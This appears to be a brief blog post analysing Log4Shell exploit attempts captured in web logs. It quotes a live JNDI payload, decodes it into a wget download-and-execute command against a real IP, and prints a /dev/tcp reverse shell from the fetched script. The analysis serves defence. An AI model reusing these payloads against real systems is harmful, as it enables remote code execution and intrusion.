_ _ _ __ __
_ __ ___ __ _ _ __| | __ ___ __ _ _ __ __| (_)/ _|/ _|
| '_ ` _ \ / _` | '__| |/ / / __/ _` | '__/ _` | | |_| |
| | | | | | (_| | | | < | (_| (_| | | | (_| | | _| _|
|_| |_| |_|\__,_|_| |_|\_\ \___\__,_|_| \__,_|_|_| |_|
Bad guys continue to attempt to exploit the vulnerability in log4j known as Log4Shell. CVE-2021-44228.
I have captured the http requests below in web server logs on this site and others:
${jndi:ldap://164.92.110.133:443/Basic/Command/Base64/d2dldCAtbmMgaHR0cDovLzEzLjg5LjQ4LjExOC9hLnNoIC1xIC1QIC90bXAvOyBjaG1vZCA3NzcgL3RtcC9hLnNoOyAvdG1wL2Euc2g7IHJtIC1yZiAvdG1wLyouc2g=}
If the web server was vulnerable, it would execute the base64 encoded commands. What do these decode to?
wget -nc http://13.89.48.118/a.sh -q -P /tmp/; chmod 777 /tmp/a.sh; /tmp/a.sh; rm -rf /tmp/*.sh
These commands will connect to the c&c server, download the file a.sh, execute and then remove any evidence.
I have downloaded the a.sh file, this contains further commands:
nohup bash -c '0<&183-;exec 183<>/dev/tcp/164.92.110.133/45982;sh <&183 >&183 2>&183' &1 &
This is an attempt to set up a reverse shell back to the attacker.
Patch your stuff!